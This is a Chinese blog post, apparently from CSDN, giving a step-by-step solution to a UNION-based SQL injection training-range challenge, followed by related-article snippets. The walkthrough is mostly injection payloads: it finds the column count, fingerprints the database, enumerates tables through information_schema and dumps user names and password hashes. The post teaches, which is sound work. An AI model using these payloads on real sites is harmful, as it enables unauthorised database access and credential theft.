union 联合注入

最新推荐文章于 2024-03-28 19:51:31 发布
最新推荐文章于 2024-03-28 19:51:31 发布
阅读量2.8k 收藏
点赞数
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiaohuadehuli/article/details/121606109
版权

墨者学院 SQL注入靶场

本篇文章为sql注入中最基础的union联合注入。

考察知识点:

  • 掌握SQL注入原理
  • 了解手工注入的方法;
  • 了解MySQL的数据结构;
  • 了解字符串的MD5加解密;

基础知识了解:

尚在整理
请添加图片描述

  • 注入点的判断:

     注入点查找就是找可控的参数,就是我们可以修改的变量,并且能够提交到后台
 (判断页面的变化即可)

  • 注入点闭合方式:

     输入闭合符号 ’ “ ) 等 来判断,
 例如 id=1‘  --+             页面返回正常 基本可以判定闭合符号就是单引号  (--+ 这是注释符)

列数的获取:

	order by  number
	页面返回不正常时  number-1 就是列数
	
	id=1 order by 4 --+

在这里插入图片描述
在这里插入图片描述
这里最大列数就是4

  • 获取回显点

     id = -1  union select 1,2,3,4   --+

在这里插入图片描述

利用回显点来爆出该网站相关信息

  • 数据库信息

    id=-1 union select 1,database(),3,4

在这里插入图片描述

  • 用户权限

     id=-1 union select 1,user(),3,4

    在这里插入图片描述

  • 操作系统版本

     id=-1 union select 1,@@version_compile_os,3,4

在这里插入图片描述

  • 网站路径

     id=-1 union select 1,@@datadir,3,4

在这里插入图片描述

  • 数据库版本

     id=-1 union select 1,version(),3,4

在这里插入图片描述

  • 获取表名

     id=-1%20union%20select%201,2,group_concat(table_name),4%20%20from%20information_schema.tables%20where%20table_schema=%22mozhe_Discuz_StormGroup%22--+

在这里插入图片描述

  • 获取列名

     id=-1%20union%20select%201,2,group_concat(column_name),4%20%20from%20information_schema.columns%20where%20table_name=%22StormGroup_member%22--+

在这里插入图片描述

-获取name ,password

id=-1%20union%20select%201,group_coNcat(name),3,4%20from%20mozhe_Discuz_StormGroup.StormGroup_member%20--+

在这里插入图片描述

id=-1%20union%20select%201,group_coNcat(password),3,4%20from%20mozhe_Discuz_StormGroup.StormGroup_member%20--+

在这里插入图片描述

  • 最后利用MD5解码
    可以获取flag
    在这里插入图片描述
月光狸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入系列篇之union联合注入
d59hao的博客
04-27 707
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
sql注入-union注入union函数 联合注入
07-11 7365
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
union 联合注入,以及SQL注入
最新发布
2303_81631620的博客
03-28 807
2.输入x’ and ‘1’='1,对应的Sql 语句:select * from table where id = ‘x’ and ‘1’=‘1’,语法正确,逻辑判断正确,所以返回正确。2.加and 1=1,如输入1 and 1=1,对应的sql:select * from table where id=1’ and 1=1 没有语法错误且逻辑判断为正确,所以返回正常。3.输入x’and ‘1’='2,对应的Sql 语句:select * from where id = ‘x’ and ‘1’=‘2’,
sql注入学习——使用sql注入进行登录,使用union进行攻击注入
Demonslzh的博客
06-27 4324
1、sql注入环境搭建 为了方便对sql注入学习,我们首先搭建一个简单的web页面,数据库使用postgresql,具体页面如下 需要这个页面源码的可以去关注页面底部公众号后台回复获取 2、使用sql注入进行登录 数据库的用户信息如下 看下登录的一个主要逻辑,登录成功后前端页面显示当前用户所拥有的权限,登录失败则显示permission denied #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 1) change to directory co
sql注入--2union注入
技术骨干小李的博客
07-14 290
union注入的初步认识
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入思路详解
12-14
1. **联合查询注入Union Query)**:通过`UNION`操作合并两个或更多查询的结果,直接展示数据库中的数据。 2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。...
sql注入讲解ppt.pptx
08-10
2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. ...
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL... 4)联合查询注入,可以使用union的情况下的注入。 5)堆查询注入,可以同时执行多条语句的执行时的注入。 比较实用的sql注入工具
SQL注入天书 sqli-labs
01-11
4. **联合查询注入**:利用UNION操作符合并两个或多个查询,以显示非预期的结果。 5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名...
sql注入union联合注入
m0_63436163的博客
01-30 899
联合查询注入联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
简单联合union查询注入
vcdy
06-02 9183
联合查询有前提  必须有显示位 用sql-labs来学习这是第一个http://127.0.0.1/sqli-labs/Less-1/?id=1一、判断是否用'做字符串引号http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+正常输出出错代表没有闭合  说明没有用'  可能没有用' 或用了"或()二、判断它所在的数据库有几列http://127.0....
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
sql注入 union联合查询注入(超详细)
jiji_king的博客
04-04 1万+
sql注入 union联合查询注入 我们以sqli-labs的第一关为例,来具体理解union联合查询注入的方法,理解每一步我为什么要这么去做。 好的,我们开始第一关! 首先查看sqli-labs第一关 这是第一关初始界面,在url界面输入?id=1 发现有回显,给我们回显了两个数据 当我们输入?id=1’ 时出现了语法错误,表示这里可能存在语法漏洞,我们进一步探索 当我们输入 ?id=1’ --+ 时,又回显正常,然后我们用 ?id=1’ and 1=1–+ 回显正常,?id=1’ and 1=2–
sql注入实战—union注入
qq_40909772的博客
07-12 758
测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1 测试工具:Burp Suite 1.注入过程。 1.1 访问该地址使用burp抓包,返回的结果如下。 1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。 1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。   由
mysql回显_sql回显注入(满满的干货)
weixin_31974443的博客
01-20 477
SQL Injection,即SQL注入SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱裤”,如今SQL注入仍是现在最常见的Web漏洞之一。SQL注入分类:按SQLMap中的分类来看,SQL注入类型有以下5种:UNION query SQL injection(可联合查询注入)Stac...
sql注入详解
m0_67392811的博客
06-12 5835
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
union注入之字符型注入和数值型注入
ws1813004226的博客
05-12 706
什么是SQL注入SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。 字符型注入 判断方法:当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。 url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值